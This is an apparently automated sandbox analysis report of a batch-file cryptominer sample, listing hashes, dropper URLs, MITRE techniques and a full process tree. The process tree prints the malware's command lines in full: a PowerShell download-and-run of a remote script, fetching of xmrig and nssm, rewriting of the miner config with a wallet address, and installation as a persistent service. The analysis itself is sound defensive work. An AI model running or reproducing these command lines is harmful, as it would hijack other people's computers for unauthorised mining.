xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
150s
max time network
138s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01-07-2024 03:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1304792021915.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 16 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\moneroocean\xmrig.exe	family_xmrig
C:\Users\Admin\moneroocean\xmrig.exe	xmrig
behavioral1/memory/932-131-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-413-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-414-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-415-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-416-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-417-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-418-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-419-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-420-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-421-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-422-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-423-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-424-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/5084-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

2 592 powershell.exe
5 3584 powershell.exe
7 4048 powershell.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 9 IoCs

Processes:

xmrig.exenssm.exenssm.exenssm.exenssm.exenssm.exenssm.exenssm.exexmrig.exe

pid process

932 xmrig.exe
4416 nssm.exe
656 nssm.exe
4996 nssm.exe
164 nssm.exe
796 nssm.exe
1412 nssm.exe
3688 nssm.exe
5084 xmrig.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

7 raw.githubusercontent.com
4 raw.githubusercontent.com
5 raw.githubusercontent.com
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

4572 sc.exe
3328 sc.exe
3600 sc.exe
2228 sc.exe

flow	pid	process
2	592	powershell.exe
5	3584	powershell.exe
7	4048	powershell.exe

pid	process
932	xmrig.exe
4416	nssm.exe
656	nssm.exe
4996	nssm.exe
164	nssm.exe
796	nssm.exe
1412	nssm.exe
3688	nssm.exe
5084	xmrig.exe

flow	ioc
7	raw.githubusercontent.com
4	raw.githubusercontent.com
5	raw.githubusercontent.com

pid	process
4572	sc.exe
3328	sc.exe
3600	sc.exe
2228	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5052	powershell.exe
4604	powershell.exe
1544	powershell.exe
4048	powershell.exe
2688	powershell.exe
3124	powershell.exe
3584	powershell.exe
2336	powershell.exe
868	powershell.exe
592	powershell.exe
752	powershell.exe
1412	powershell.exe
748	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
3308	timeout.exe
3840	timeout.exe
4440	timeout.exe
2904	timeout.exe
1848	timeout.exe
2636	timeout.exe
868	timeout.exe
1288	timeout.exe
4504	timeout.exe
1484	timeout.exe
3216	timeout.exe
1108	timeout.exe
3120	timeout.exe
5056	timeout.exe
4508	timeout.exe
3712	timeout.exe
4436	timeout.exe
5000	timeout.exe
4112	timeout.exe
752	timeout.exe
1200	timeout.exe
3080	timeout.exe
4500	timeout.exe
2304	timeout.exe
360	timeout.exe
1148	timeout.exe
1860	timeout.exe
3756	timeout.exe
5004	timeout.exe
484	timeout.exe
4392	timeout.exe
2136	timeout.exe
748	timeout.exe
2516	timeout.exe
1180	timeout.exe
664	timeout.exe
2776	timeout.exe
4632	timeout.exe
2372	timeout.exe
1848	timeout.exe
1684	timeout.exe
4588	timeout.exe
1356	timeout.exe
4588	timeout.exe
1888	timeout.exe
4892	timeout.exe
3452	timeout.exe
3932	timeout.exe
3580	timeout.exe
4388	timeout.exe
5108	timeout.exe
648	timeout.exe
1712	timeout.exe
200	timeout.exe
1988	timeout.exe
3800	timeout.exe
2228	timeout.exe
3892	timeout.exe
8	timeout.exe
1960	timeout.exe
3760	timeout.exe
4508	timeout.exe
4636	timeout.exe
4176	timeout.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4768 taskkill.exe
Runs net.exe

pid	process
4768	taskkill.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
592	powershell.exe
592	powershell.exe
592	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
2336	powershell.exe
2336	powershell.exe
2336	powershell.exe
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe
5052	powershell.exe
5052	powershell.exe
5052	powershell.exe
1412	powershell.exe
1412	powershell.exe
1412	powershell.exe
748	powershell.exe
748	powershell.exe
748	powershell.exe
868	powershell.exe
868	powershell.exe
868	powershell.exe
4604	powershell.exe
4604	powershell.exe
4604	powershell.exe
1544	powershell.exe
1544	powershell.exe
1544	powershell.exe
4048	powershell.exe
4048	powershell.exe
4048	powershell.exe
2688	powershell.exe
2688	powershell.exe
2688	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexmrig.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	592	powershell.exe
Token: SeDebugPrivilege	4768	taskkill.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeLockMemoryPrivilege	5084	xmrig.exe
Token: SeIncreaseQuotaPrivilege	1440	WMIC.exe
Token: SeSecurityPrivilege	1440	WMIC.exe
Token: SeTakeOwnershipPrivilege	1440	WMIC.exe
Token: SeLoadDriverPrivilege	1440	WMIC.exe
Token: SeSystemProfilePrivilege	1440	WMIC.exe
Token: SeSystemtimePrivilege	1440	WMIC.exe
Token: SeProfSingleProcessPrivilege	1440	WMIC.exe
Token: SeIncBasePriorityPrivilege	1440	WMIC.exe
Token: SeCreatePagefilePrivilege	1440	WMIC.exe
Token: SeBackupPrivilege	1440	WMIC.exe
Token: SeRestorePrivilege	1440	WMIC.exe
Token: SeShutdownPrivilege	1440	WMIC.exe
Token: SeDebugPrivilege	1440	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1440	WMIC.exe
Token: SeRemoteShutdownPrivilege	1440	WMIC.exe
Token: SeUndockPrivilege	1440	WMIC.exe
Token: SeManageVolumePrivilege	1440	WMIC.exe
Token: 33	1440	WMIC.exe
Token: 34	1440	WMIC.exe
Token: 35	1440	WMIC.exe
Token: 36	1440	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1440	WMIC.exe
Token: SeSecurityPrivilege	1440	WMIC.exe
Token: SeTakeOwnershipPrivilege	1440	WMIC.exe
Token: SeLoadDriverPrivilege	1440	WMIC.exe
Token: SeSystemProfilePrivilege	1440	WMIC.exe
Token: SeSystemtimePrivilege	1440	WMIC.exe
Token: SeProfSingleProcessPrivilege	1440	WMIC.exe
Token: SeIncBasePriorityPrivilege	1440	WMIC.exe
Token: SeCreatePagefilePrivilege	1440	WMIC.exe
Token: SeBackupPrivilege	1440	WMIC.exe
Token: SeRestorePrivilege	1440	WMIC.exe
Token: SeShutdownPrivilege	1440	WMIC.exe
Token: SeDebugPrivilege	1440	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1440	WMIC.exe
Token: SeRemoteShutdownPrivilege	1440	WMIC.exe
Token: SeUndockPrivilege	1440	WMIC.exe
Token: SeManageVolumePrivilege	1440	WMIC.exe
Token: 33	1440	WMIC.exe
Token: 34	1440	WMIC.exe
Token: 35	1440	WMIC.exe
Token: 36	1440	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5076	WMIC.exe
Token: SeSecurityPrivilege	5076	WMIC.exe
Token: SeTakeOwnershipPrivilege	5076	WMIC.exe
Token: SeLoadDriverPrivilege	5076	WMIC.exe
Token: SeSystemProfilePrivilege	5076	WMIC.exe
Token: SeSystemtimePrivilege	5076	WMIC.exe
Token: SeProfSingleProcessPrivilege	5076	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

xmrig.exe

pid process

5084 xmrig.exe

pid	process
5084	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.execmd.exenet.execmd.exepowershell.exe

description	pid	process	target process
PID 1944 wrote to memory of 592	1944	cmd.exe	powershell.exe
PID 1944 wrote to memory of 592	1944	cmd.exe	powershell.exe
PID 592 wrote to memory of 3452	592	powershell.exe	cmd.exe
PID 592 wrote to memory of 3452	592	powershell.exe	cmd.exe
PID 3452 wrote to memory of 3328	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 3328	3452	cmd.exe	sc.exe
PID 3328 wrote to memory of 1968	3328	net.exe	net1.exe
PID 3328 wrote to memory of 1968	3328	net.exe	net1.exe
PID 3452 wrote to memory of 4680	3452	cmd.exe	where.exe
PID 3452 wrote to memory of 4680	3452	cmd.exe	where.exe
PID 3452 wrote to memory of 3868	3452	cmd.exe	where.exe
PID 3452 wrote to memory of 3868	3452	cmd.exe	where.exe
PID 3452 wrote to memory of 4956	3452	cmd.exe	where.exe
PID 3452 wrote to memory of 4956	3452	cmd.exe	where.exe
PID 3452 wrote to memory of 220	3452	cmd.exe	where.exe
PID 3452 wrote to memory of 220	3452	cmd.exe	where.exe
PID 3452 wrote to memory of 5116	3452	cmd.exe	where.exe
PID 3452 wrote to memory of 5116	3452	cmd.exe	where.exe
PID 3452 wrote to memory of 2228	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 2228	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 3600	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 3600	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 4768	3452	cmd.exe	taskkill.exe
PID 3452 wrote to memory of 4768	3452	cmd.exe	taskkill.exe
PID 3452 wrote to memory of 3584	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 3584	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 752	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 752	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 2336	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 2336	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 932	3452	cmd.exe	xmrig.exe
PID 3452 wrote to memory of 932	3452	cmd.exe	xmrig.exe
PID 3452 wrote to memory of 4276	3452	cmd.exe	cmd.exe
PID 3452 wrote to memory of 4276	3452	cmd.exe	cmd.exe
PID 4276 wrote to memory of 3124	4276	cmd.exe	powershell.exe
PID 4276 wrote to memory of 3124	4276	cmd.exe	powershell.exe
PID 3124 wrote to memory of 4240	3124	powershell.exe	HOSTNAME.EXE
PID 3124 wrote to memory of 4240	3124	powershell.exe	HOSTNAME.EXE
PID 3452 wrote to memory of 5052	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 5052	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 1412	3452	cmd.exe	nssm.exe
PID 3452 wrote to memory of 1412	3452	cmd.exe	nssm.exe
PID 3452 wrote to memory of 748	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 748	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 868	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 868	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 4604	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 4604	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 1544	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 1544	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 4048	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 4048	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 2688	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 2688	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 4572	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 4572	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 3328	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 3328	3452	cmd.exe	sc.exe
PID 3452 wrote to memory of 4416	3452	cmd.exe	nssm.exe
PID 3452 wrote to memory of 4416	3452	cmd.exe	nssm.exe
PID 3452 wrote to memory of 656	3452	cmd.exe	WMIC.exe
PID 3452 wrote to memory of 656	3452	cmd.exe	WMIC.exe
PID 3452 wrote to memory of 4996	3452	cmd.exe	nssm.exe
PID 3452 wrote to memory of 4996	3452	cmd.exe	nssm.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1304792021915.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5FE3.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
3⤵
- Suspicious use of WriteProcessMemory
PID:3452

C:\Windows\system32\net.exe
net session
4⤵
- Suspicious use of WriteProcessMemory
PID:3328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
5⤵
PID:1968

C:\Windows\system32\where.exe
where powershell
4⤵
PID:4680

C:\Windows\system32\where.exe
where find
4⤵
PID:3868

C:\Windows\system32\where.exe
where findstr
4⤵
PID:4956

C:\Windows\system32\where.exe
where tasklist
4⤵
PID:220

C:\Windows\system32\where.exe
where sc
4⤵
PID:5116

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:2228

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:3600

C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe" --help
4⤵
- Executes dropped EXE
PID:932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
4⤵
- Suspicious use of WriteProcessMemory
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3124

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
6⤵
PID:4240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Uoklywyh\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:4572

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:3328

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
4⤵
- Executes dropped EXE
PID:4416

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
4⤵
- Executes dropped EXE
PID:656

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
4⤵
- Executes dropped EXE
PID:4996

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
4⤵
- Executes dropped EXE
PID:164

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
4⤵
- Executes dropped EXE
PID:796

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
4⤵
- Executes dropped EXE
PID:1412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1900

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4964

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5076

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2068

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4860

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2716

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4736

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5012

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:600

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5040

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1936

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1920

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1864

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4536

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3804

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1868

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1856

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2360

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1064

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3408

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1472

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4836

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1008

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2896

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1092

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3020

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4100

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3712

C:\Windows\system32\cmd.exe
